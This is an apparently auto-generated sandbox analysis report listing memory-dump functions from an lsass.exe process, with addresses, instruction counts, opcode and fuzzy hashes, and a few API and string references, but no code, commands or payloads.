Opcode ID: 31176d9e0dc5d3a3d2a023bce21f68e413a9c5502f226333fb1c792caeea09f1
Instruction ID: dc56fb0b3d98725fe4b6653ce8ed82e70316826ec4480776353e6c05e3d5cfe2
Opcode Fuzzy Hash: 31176d9e0dc5d3a3d2a023bce21f68e413a9c5502f226333fb1c792caeea09f1
Instruction Fuzzy Hash: 55F0A021B0DB880FC76A566D48A8061BFE1DBAA51134A53EFC045CB6B3ED59AC898342

Function 00007FFD9BAB32CD Relevance: .0, Instructions: 35COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000016.00000002.2126612701.00007FFD9BAB0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BAB0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_22_2_7ffd9bab0000_lsass.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 4eb1ffb5accd51ad36bdc4814720d1f5197c5ab215985cd5784c1b037849105d
Instruction ID: af639c424b252f5fa5db2f4a3a258807e4ba1ded573f9e5b69aef53d2e8528f3
Opcode Fuzzy Hash: 4eb1ffb5accd51ad36bdc4814720d1f5197c5ab215985cd5784c1b037849105d
Instruction Fuzzy Hash: FEF03630B0A92E8AEB74DB54DC647F873A1EF54311F1142B6C41AD31B1DDB96AC58F00

Function 00007FFD9BAB0C50 Relevance: .0, Instructions: 34COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000016.00000002.2126612701.00007FFD9BAB0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BAB0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_22_2_7ffd9bab0000_lsass.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 503368e294ea1390e0962fbb6cb8f133d2f9d11313eff96316767aa6eb176c77
Instruction ID: f8fc8f086b6137360f1e985ce6c11eea738fa21fc88d6fa54b821d541ec201d2
Opcode Fuzzy Hash: 503368e294ea1390e0962fbb6cb8f133d2f9d11313eff96316767aa6eb176c77
Instruction Fuzzy Hash: E501A230E0E28D8FE731DBA4886419DBFB0EF46314F1541E7D454DB2A6EA785644CB45

Function 00007FFD9BAB0B77 Relevance: .0, Instructions: 34COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000016.00000002.2126612701.00007FFD9BAB0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BAB0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_22_2_7ffd9bab0000_lsass.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: ef4601ae45a06a77248c753546aff5bcb5e04059b921ee826eb48a5e68162104
Instruction ID: ce45e0d2416faefd647106c6a0a8830557c119d7b8a07d8f6187189ebb314324
Opcode Fuzzy Hash: ef4601ae45a06a77248c753546aff5bcb5e04059b921ee826eb48a5e68162104
Instruction Fuzzy Hash: AFF0AB3560DA49CFDB84AB38ECA18D0BF60EF07208B4615EEC089C70A3E250191CC700

Function 00007FFD9BEB0F69 Relevance: .0, Instructions: 30COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000016.00000002.2131312949.00007FFD9BEA0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BEA0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_22_2_7ffd9bea0000_lsass.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 0800f8298a5483d36ed203f0836652edf35d9cc4f20f43554f234bba05ae465a
Instruction ID: afddf22e0577f507906c820da2a84540cc9efb90aafbd809d60d59947eb02334
Opcode Fuzzy Hash: 0800f8298a5483d36ed203f0836652edf35d9cc4f20f43554f234bba05ae465a
Instruction Fuzzy Hash: 3DE0D820709B884FC70E56388C695507FB1EB6710278A02DBD005CB2A3ED19DCC9C741

Function 00007FFD9BAB32A4 Relevance: .0, Instructions: 30COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000016.00000002.2126612701.00007FFD9BAB0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BAB0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_22_2_7ffd9bab0000_lsass.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 620c400f58104c25ee72f0295a701db363e685c0fd8beffa55c38e5a76923487
Instruction ID: 9f8e6dc2377c6506cd56cbd4283d7fa592cdf2ac84363c4df4592e203123e5ab
Opcode Fuzzy Hash: 620c400f58104c25ee72f0295a701db363e685c0fd8beffa55c38e5a76923487
Instruction Fuzzy Hash: 06F05430B0A52E4AEBB0D784D8A47F97391EF54311F114277C42DD71F2DD696E458E40

Function 00007FFD9BEA325E Relevance: .0, Instructions: 25COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000016.00000002.2131312949.00007FFD9BEA0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BEA0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_22_2_7ffd9bea0000_lsass.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 823e00c4012131f225cbea92937d3ad1c2cb8ddf5a5f4ede266f3cd96edb8a43
Instruction ID: 1404fd9998182d2bd5161342a22ed76b9f7ac2f77f8f6164142c1f0ffa22654e
Opcode Fuzzy Hash: 823e00c4012131f225cbea92937d3ad1c2cb8ddf5a5f4ede266f3cd96edb8a43
Instruction Fuzzy Hash: ABF0653030950B8BE729DA88C0A57A573D9EB54304F15413DD516C77E1DB7AB5408B40

Function 00007FFD9BEB20A9 Relevance: .0, Instructions: 25COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000016.00000002.2131312949.00007FFD9BEA0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BEA0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_22_2_7ffd9bea0000_lsass.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 26fa3b39cc0c20e7d6504f4ddefd72dea81e5e6ce85381d73b810566bc12f261
Instruction ID: 1f91ac152701918e2b9ccb753d4d209ecdd82b9e5d4f406bef456d79caaaf0ea
Opcode Fuzzy Hash: 26fa3b39cc0c20e7d6504f4ddefd72dea81e5e6ce85381d73b810566bc12f261
Instruction Fuzzy Hash: CCE04F6694F7C04FCB1B9B3588B88903F70EE5761074A51EAC045CF1B3D91A9D4AC701

Function 00007FFD9BAB4856 Relevance: .0, Instructions: 25COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000016.00000002.2126612701.00007FFD9BAB0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BAB0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_22_2_7ffd9bab0000_lsass.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: adfefc78be286baa70d8127a01833431ec7a8f5ba8ca94a7f1aedb3396401bcf
Instruction ID: 4fd8c9169543bd2b545fc227e118e41cb778c437ebcb1fad26441731ff349397
Opcode Fuzzy Hash: adfefc78be286baa70d8127a01833431ec7a8f5ba8ca94a7f1aedb3396401bcf
Instruction Fuzzy Hash: 7FE08611F1E51D07F67456FC54392B53381EB84710F124379E45E833E2ECBCA9430545

Function 00007FFD9BAB16B0 Relevance: .0, Instructions: 25COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000016.00000002.2126612701.00007FFD9BAB0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BAB0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_22_2_7ffd9bab0000_lsass.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 33ce092d330706656787fe6c1980c23132291f1bbc9d9feda2edb2cb72a22dcb
Instruction ID: 5311e8d633b42a250be9cb45fd10ebe24f6b6b5e350b92b90a0f9787c02c5e17
Opcode Fuzzy Hash: 33ce092d330706656787fe6c1980c23132291f1bbc9d9feda2edb2cb72a22dcb
Instruction Fuzzy Hash: 21E09B31B0852A87F7299744C8707B83265EB94300F1541BDC95FD36E1DD786E018A84

Function 00007FFD9BAB0550 Relevance: .0, Instructions: 14COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000016.00000002.2126612701.00007FFD9BAB0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BAB0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_22_2_7ffd9bab0000_lsass.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 7fdf602137d90e6debaf839302e7d69ca211fd4c7a08774291bb3d48c776c48c
Instruction ID: 30aed3dc3bc570caf775bb6eac20c41e74e3e9b8ff89cf05638fa160c359512c
Opcode Fuzzy Hash: 7fdf602137d90e6debaf839302e7d69ca211fd4c7a08774291bb3d48c776c48c
Instruction Fuzzy Hash: FDC08C32E2FA5902EA64D3BA0CB301038C0EB8F304FCB00F4E5AC802E2EC8E15498246

Function 00007FFD9BAB06A5 Relevance: .0, Instructions: 13COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000016.00000002.2126612701.00007FFD9BAB0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BAB0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_22_2_7ffd9bab0000_lsass.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 01e38e70d1fa6bb65dd097346d22abdbea730342f4aa22208da91687ed01f3b5
Instruction ID: fb7d575317d99b2d6e583da376a67d8a6c0d87e5e348c7ee0fe165f5f94f7796
Opcode Fuzzy Hash: 01e38e70d1fa6bb65dd097346d22abdbea730342f4aa22208da91687ed01f3b5
Instruction Fuzzy Hash: 41C04C05F5B53F01F53573EF58760ADB5409BD5A50FD70176D52C800E19CDD22D5095E

Function 00007FFD9BEA323B Relevance: .0, Instructions: 11COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000016.00000002.2131312949.00007FFD9BEA0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BEA0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_22_2_7ffd9bea0000_lsass.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 6f60e8a32dc7cd82cdab9b8126faffc729a7f5ee650283cebf0420754674fa9f
Instruction ID: 5c3836401fa5f36ba66d385df7dbf7d4ed3a959fc71f56cc2a164d6d90b52acd
Opcode Fuzzy Hash: 6f60e8a32dc7cd82cdab9b8126faffc729a7f5ee650283cebf0420754674fa9f
Instruction Fuzzy Hash: 08D0C994B0F65F85F13B4AC1407023951AC5F41700E22413DD06F418F1DD1F7B016211

Function 00007FFD9BAB520E Relevance: .0, Instructions: 10COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000016.00000002.2126612701.00007FFD9BAB0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BAB0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_22_2_7ffd9bab0000_lsass.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 91e834ae1ae304aeaed4e0af4b4142cc12e6c9d767d6e7de685406348d3faab0
Instruction ID: 9dc8980ef5b234010dabf8dd927e35685d1c14c9b44a943e9c02e1918835d4eb
Opcode Fuzzy Hash: 91e834ae1ae304aeaed4e0af4b4142cc12e6c9d767d6e7de685406348d3faab0
Instruction Fuzzy Hash: 15C04C01F19C2A16F25E7718553167D08439F5461CFD54179E82ED63CECE5C5B0506C6

Function 00007FFD9BEA274F Relevance: .0, Instructions: 8COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000016.00000002.2131312949.00007FFD9BEA0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BEA0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_22_2_7ffd9bea0000_lsass.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 9120d7d5d510d60ddd58d7ec11383884db066a8e4b3a30c3828bebc2efdefe9d
Instruction ID: 3c6ca6db2bb23bad56b9c5541718cc6c178af57e2016516e12501095d08f1f63
Opcode Fuzzy Hash: 9120d7d5d510d60ddd58d7ec11383884db066a8e4b3a30c3828bebc2efdefe9d
Instruction Fuzzy Hash: 35C04C80F0E34A66E63515E005A107D07881B16644B5615B1D546651E3E84D6A055611

Function 00007FFD9BAB06C8 Relevance: .0, Instructions: 8COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000016.00000002.2126612701.00007FFD9BAB0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BAB0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_22_2_7ffd9bab0000_lsass.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: bfec55d506deb6a0e66d98d92f25c69081eec8d6f86558604ed38352e00b2f3f
Instruction ID: 7ad76d07ff73bcb551725c24866291c2a8f6a14c1a88fed5b5653d8c15e37f51
Opcode Fuzzy Hash: bfec55d506deb6a0e66d98d92f25c69081eec8d6f86558604ed38352e00b2f3f
Instruction Fuzzy Hash: 28B01200D5741F00E43433FB0C5206974409B44100FC20070D41C8009198CD12D40A46

Non-executed Functions

Function 00007FFD9BAB09B0 Relevance: 5.2, Strings: 4, Instructions: 183COMMON

Download Yara Rule

Strings

#{9, xrefs: 00007FFD9BAB0B3E
"s9, xrefs: 00007FFD9BAB0B46
!k9, xrefs: 00007FFD9BAB0B4E
c9, xrefs: 00007FFD9BAB0B56

Memory Dump Source

Source File: 00000016.00000002.2126612701.00007FFD9BAB0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BAB0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_22_2_7ffd9bab0000_lsass.jbxd

Similarity

API ID:
String ID: c9$!k9$"s9$#{9
API String ID: 0-1692736845
Opcode ID: d59053071498ded36b2a0733dd21947c896e337ec829b81f1db0c2306f994b14
Instruction ID: da433a151d44defa96aa13487a96a2101b75b00cfcfe6e92f3eb4b380a84e17a
Opcode Fuzzy Hash: d59053071498ded36b2a0733dd21947c896e337ec829b81f1db0c2306f994b14
Instruction Fuzzy Hash: AB418E07B0957645E23973FD78219E95B848FA927FB0847B7F56E8D0D78C486082C2E9

Analysis Process: lsass.exePID: 1432, Parent PID: 824COMMON

Execution Graph

Execution Coverage:	14.1%
Dynamic/Decrypted Code Coverage:	33.3%
Signature Coverage:	0%
Total number of Nodes:	9
Total number of Limit Nodes:	0

Executed Functions

Function 00007FFD9BAB0D47 Relevance: 1.5, Strings: 1, Instructions: 235
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

Strings

5Z_H, xrefs: 00007FFD9BAB0DF3

Memory Dump Source

Source File: 0000001B.00000002.2274178941.00007FFD9BAB0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BAB0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_27_2_7ffd9bab0000_lsass.jbxd

Similarity

API ID:
String ID: 5Z_H
API String ID: 0-3267294416
Opcode ID: cb4dcab49a2a047fc49b212eace48576a2ef573ae5db9c8bb1e29fe0fae272cb
Instruction ID: 08dd1c3198defe92940c35b82990a1fc83b96563d9f65f10ab6761ce984ab2e1
Opcode Fuzzy Hash: cb4dcab49a2a047fc49b212eace48576a2ef573ae5db9c8bb1e29fe0fae272cb
Instruction Fuzzy Hash: 01812861A0DADD4FE769DB6888397A87FE1FF55314F4501BED099C72E6DBB818048B00

Function 00007FFD9BAF5505 Relevance: 1.7, APIs: 1, Instructions: 156
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

CreateFileTransactedW.KERNEL32 ref: 00007FFD9BAF5609

Memory Dump Source

Source File: 0000001B.00000002.2274178941.00007FFD9BAF5000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BAF5000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_27_2_7ffd9baf5000_lsass.jbxd

Similarity

API ID: CreateFileTransacted
String ID:
API String ID: 2149338676-0
Opcode ID: 4796271d2ad1337c1c9a3129debf1b46703229da2b4c982ce56501b339ebe98b
Instruction ID: 7f4a8d847c455cd6afa23a4085d7a760cc687cb17c68a62621130dfee04cd0cd
Opcode Fuzzy Hash: 4796271d2ad1337c1c9a3129debf1b46703229da2b4c982ce56501b339ebe98b
Instruction Fuzzy Hash: D2418F7191CB588FDB58EF5CD845AE97BF0FB69720F00426FE449E3251CA74A845CB82

Function 00007FFD9BAF56E1 Relevance: 1.6, APIs: 1, Instructions: 136
fileCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

WriteFile.KERNEL32 ref: 00007FFD9BAF57B7

Memory Dump Source

Source File: 0000001B.00000002.2274178941.00007FFD9BAF5000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BAF5000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_27_2_7ffd9baf5000_lsass.jbxd

Similarity

API ID: FileWrite
String ID:
API String ID: 3934441357-0
Opcode ID: 6a50d26688d0c82a4e25f5763308ffc4608d3aeecc20f0c39b0d31bb84f1e21d
Instruction ID: 635ec605bf339c6d905880c143fde5a704e89dc67ab691c9f2da400ab4227f81
Opcode Fuzzy Hash: 6a50d26688d0c82a4e25f5763308ffc4608d3aeecc20f0c39b0d31bb84f1e21d
Instruction Fuzzy Hash: A931A27190CA4C8FDB18DF5898456F9BBF1FB69311F00426FD049D3292DB74A846CB81

Function 00007FFD9BB17DE8 Relevance: 1.4, Strings: 1, Instructions: 157
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

Strings

, xrefs: 00007FFD9BB17E62

Memory Dump Source

Source File: 0000001B.00000002.2274178941.00007FFD9BB14000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BB14000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_27_2_7ffd9bb14000_lsass.jbxd

Similarity

API ID:
String ID:
API String ID: 0-3916222277
Opcode ID: da3909b87ac7a59861d1979320459f221cf6cd67413d8f51ef09d0f8e826ed7c
Instruction ID: 69c34722227bf5e04ba7e45050b7804ef1c02a624e1115e6a677b8b327eb18be
Opcode Fuzzy Hash: da3909b87ac7a59861d1979320459f221cf6cd67413d8f51ef09d0f8e826ed7c
Instruction Fuzzy Hash: 4B516EB2E0A54E8FDB68DFA8C4645BDB7B1FF44304F1141BAD01AD72D6CA342A05CB41

Function 00007FFD9BEA3D58 Relevance: 1.4, Strings: 1, Instructions: 129
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

Strings

, xrefs: 00007FFD9BEA3DD2

Memory Dump Source

Source File: 0000001B.00000002.2276819634.00007FFD9BEA0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BEA0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_27_2_7ffd9bea0000_lsass.jbxd

Similarity

API ID:
String ID:
API String ID: 0-3916222277
Opcode ID: 8aeab6326c047d25cecf7ddbae4d6dfda05934276e49fbe667e04110477fc972
Instruction ID: 5fb0d2af20f350d9d902e3ba63b99c8e4c68ea58e36d34718a641ec8abea3f51
Opcode Fuzzy Hash: 8aeab6326c047d25cecf7ddbae4d6dfda05934276e49fbe667e04110477fc972
Instruction Fuzzy Hash: FF412B71E0960E9FDB5ADF94C4A15BDBBB5FF48304F1140BAD01AA72A6CB396A01CB10

Function 00007FFD9BB1684B Relevance: 1.3, Strings: 1, Instructions: 95
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

Strings

G_, xrefs: 00007FFD9BB168C6

Memory Dump Source

Source File: 0000001B.00000002.2274178941.00007FFD9BB14000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BB14000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_27_2_7ffd9bb14000_lsass.jbxd

Similarity

API ID:
String ID: G_
API String ID: 0-87394136
Opcode ID: b7387dcf73440738cddaf99efeeeef2b81fdebf04aa961b9221680865f7b753c
Instruction ID: fbdf7dcf94e6e65f6be4b2599afeac20ac4e2e1025a1d2b9880c1b81b86118e3
Opcode Fuzzy Hash: b7387dcf73440738cddaf99efeeeef2b81fdebf04aa961b9221680865f7b753c
Instruction Fuzzy Hash: DB314C71B1990E8FDB58DEA8D4615B8B3A2FF58314F114139E15ED32A5CF247C12CB80

Function 00007FFD9BB190A1 Relevance: 1.2, Instructions: 1174
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

Memory Dump Source

Source File: 0000001B.00000002.2274178941.00007FFD9BB14000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BB14000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_27_2_7ffd9bb14000_lsass.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: caa4f9982dd26f8a7338f5059a55138eb9dba22427f1c53dce3304ea64b1b474
Instruction ID: fcfb9332560b6868578c30014a6173241ae4eacce6d480fc4f63c711890aa0e6
Opcode Fuzzy Hash: caa4f9982dd26f8a7338f5059a55138eb9dba22427f1c53dce3304ea64b1b474
Instruction Fuzzy Hash: 7951C230A0AB4A8FD368DF54C5A867173E1FF05308B51593DC48EC3AE6CB25B942CB80

Function 00007FFD9BB15D5D Relevance: .7, Instructions: 685
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

Memory Dump Source

Source File: 0000001B.00000002.2274178941.00007FFD9BB14000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BB14000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_27_2_7ffd9bb14000_lsass.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 031edd2a0655d65a6e0a1ce5f8f7884764f5e0e7bcc9a2b1d527fd556f63b932
Instruction ID: 83b3c7e2937478ad38ee5aaca39b7413f916c6d02c9ba69e3e177c5516f0324b
Opcode Fuzzy Hash: 031edd2a0655d65a6e0a1ce5f8f7884764f5e0e7bcc9a2b1d527fd556f63b932
Instruction Fuzzy Hash: 9732A230B09A0D8FDBA8DF58C8A5A6873E2FF58314F5151B9D40EC72E6DE24AD45CB80

Function 00007FFD9BEA1247 Relevance: .3, Instructions: 311
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

Memory Dump Source

Source File: 0000001B.00000002.2276819634.00007FFD9BEA0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BEA0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_27_2_7ffd9bea0000_lsass.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: e36ceb3140990f8c67ee919ba54ee94cd60f51004e3ab408b8f22c57fe285deb
Instruction ID: 19a5cddcba63515e5fa6ef3dd101043ea8956d888ccbec207ad8fb4dcb397c73
Opcode Fuzzy Hash: e36ceb3140990f8c67ee919ba54ee94cd60f51004e3ab408b8f22c57fe285deb
Instruction Fuzzy Hash: 9E21E892F0F1AB86F67555ED24310FC6B4C6F46334F1A06B6D49D850E2DC0E2681D293

Function 00007FFD9BB17912 Relevance: .3, Instructions: 308
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

Memory Dump Source

Source File: 0000001B.00000002.2274178941.00007FFD9BB14000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BB14000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_27_2_7ffd9bb14000_lsass.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 86d00639f5a45cb88c7c85d8e551c93acae688d6655b253809f773da7ed71f94
Instruction ID: ff9926d6174264ad1bde286aad2a60fe80ac177c65dd6cd9df906dd30519e387
Opcode Fuzzy Hash: 86d00639f5a45cb88c7c85d8e551c93acae688d6655b253809f773da7ed71f94
Instruction Fuzzy Hash: 94B1F3B1B1AA4A8FD359DF69C0A06A4B7A0FF19308F555179C04EC7AD6CB28F951CB80

Function 00007FFD9BEA3FCF Relevance: .3, Instructions: 295
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

Memory Dump Source

Source File: 0000001B.00000002.2276819634.00007FFD9BEA0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BEA0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_27_2_7ffd9bea0000_lsass.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 658605edaa5d64137b896570f0ba86838e396e1ee74f975b408d90267e9a0fce
Instruction ID: 0ede4fbeb963d5ce3ad3450d6fb8c32c7d389e56e98b577175e3c1292d6971ee
Opcode Fuzzy Hash: 658605edaa5d64137b896570f0ba86838e396e1ee74f975b408d90267e9a0fce
Instruction Fuzzy Hash: 95B1DF706196058FEB5DCF48C0E15B53BB5FF48311B9042BCC84B8B69AD739E992CB81

Function 00007FFD9BB1805F Relevance: .3, Instructions: 293
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

Memory Dump Source

Source File: 0000001B.00000002.2274178941.00007FFD9BB14000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BB14000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_27_2_7ffd9bb14000_lsass.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 0a0ba962360f479c30b77b529823c511e13ec1bd2e863c29467913c0abc89e01
Instruction ID: abe5aa348e1cbd736392fae450cb28a0b859f633d8046382b38f904d18157b5e
Opcode Fuzzy Hash: 0a0ba962360f479c30b77b529823c511e13ec1bd2e863c29467913c0abc89e01
Instruction Fuzzy Hash: 36B1CF70619A098FEB5DCF08D4E06B137A1FF49314B5552BCD84A8B69BC738F992CB81

Function 00007FFD9BEA2DB6 Relevance: .3, Instructions: 255
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

Memory Dump Source

Source File: 0000001B.00000002.2276819634.00007FFD9BEA0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BEA0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_27_2_7ffd9bea0000_lsass.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 32b32a479660b1f55723844002f23f786c1accce1101d2d3d37fcede18da1b82
Instruction ID: c5098af50d37399865b3d1776ccec4f3ad60bef2e2ba4879ee5cd6e099471f90
Opcode Fuzzy Hash: 32b32a479660b1f55723844002f23f786c1accce1101d2d3d37fcede18da1b82
Instruction Fuzzy Hash: 05819AB1B1EA4A4FE3398BE8996117577ECFF45300B12417ED08ED31A2DF2AB6428741

Function 00007FFD9BEA0EF9 Relevance: .2, Instructions: 249COMMON

Download Yara Rule

Memory Dump Source

Source File: 0000001B.00000002.2276819634.00007FFD9BEA0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BEA0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_27_2_7ffd9bea0000_lsass.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: b4d69df1f706b157d256da3ff38fc5051ff2313d8c7980bf92bada0d1838e3f5
Instruction ID: 55be3f91dcdd3be4ce843035818c6ef057918398c7b4ada8ab8b4a795e043d2b
Opcode Fuzzy Hash: b4d69df1f706b157d256da3ff38fc5051ff2313d8c7980bf92bada0d1838e3f5
Instruction Fuzzy Hash: 55714BB4B0E58D4FE778DA5888669B437CCFF55310B0502B9D09ED3573DA1AAE0AC782

Function 00007FFD9BB14FA9 Relevance: .2, Instructions: 248COMMON

Download Yara Rule

Memory Dump Source

Source File: 0000001B.00000002.2274178941.00007FFD9BB14000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BB14000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_27_2_7ffd9bb14000_lsass.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 74aad38c865a7702ec761b4767b9ff13756c2fb07b4faf6b6b40da39ee3a4f0b
Instruction ID: e271f0e8967be1082c05d634a691836580102fee35824a30b50f0661ffd4514b
Opcode Fuzzy Hash: 74aad38c865a7702ec761b4767b9ff13756c2fb07b4faf6b6b40da39ee3a4f0b
Instruction Fuzzy Hash: B9711431A0E54E8FE778DE98886A5B837C0FF44314B1612B9D45EC75F2DE18AA1A87C1

Function 00007FFD9BB16E60 Relevance: .2, Instructions: 237COMMON

Download Yara Rule

Memory Dump Source

Source File: 0000001B.00000002.2274178941.00007FFD9BB14000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BB14000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_27_2_7ffd9bb14000_lsass.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 5dccfd4ca8fdc1af3c99d81cc02555904fb5fec18da3ff312d0d55c74ab27240
Instruction ID: b3a72f9974cbfb8913d40af666af668c651ccf9c67636c3fd0a8dd6ea1038e36
Opcode Fuzzy Hash: 5dccfd4ca8fdc1af3c99d81cc02555904fb5fec18da3ff312d0d55c74ab27240
Instruction Fuzzy Hash: 55712832B1D60A8FE3389E9894655B973E1FF45318F12157ED48FC36E2DE29BA028741

Function 00007FFD9BEA402B Relevance: .2, Instructions: 221COMMON

Download Yara Rule

Memory Dump Source

Source File: 0000001B.00000002.2276819634.00007FFD9BEA0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BEA0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_27_2_7ffd9bea0000_lsass.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 1483699c16ab050185276a7b521f403110958d8bf7332933be4457f0d50ae056
Instruction ID: f048ac92b2362902376c1880b509e23043b87b76c192dd37733236870a852fc9
Opcode Fuzzy Hash: 1483699c16ab050185276a7b521f403110958d8bf7332933be4457f0d50ae056
Instruction Fuzzy Hash: 4581CFB06156058FEB1CCF48D0E15B53BB5FF58315B9142BCC84B8B68ADB39E992CB80

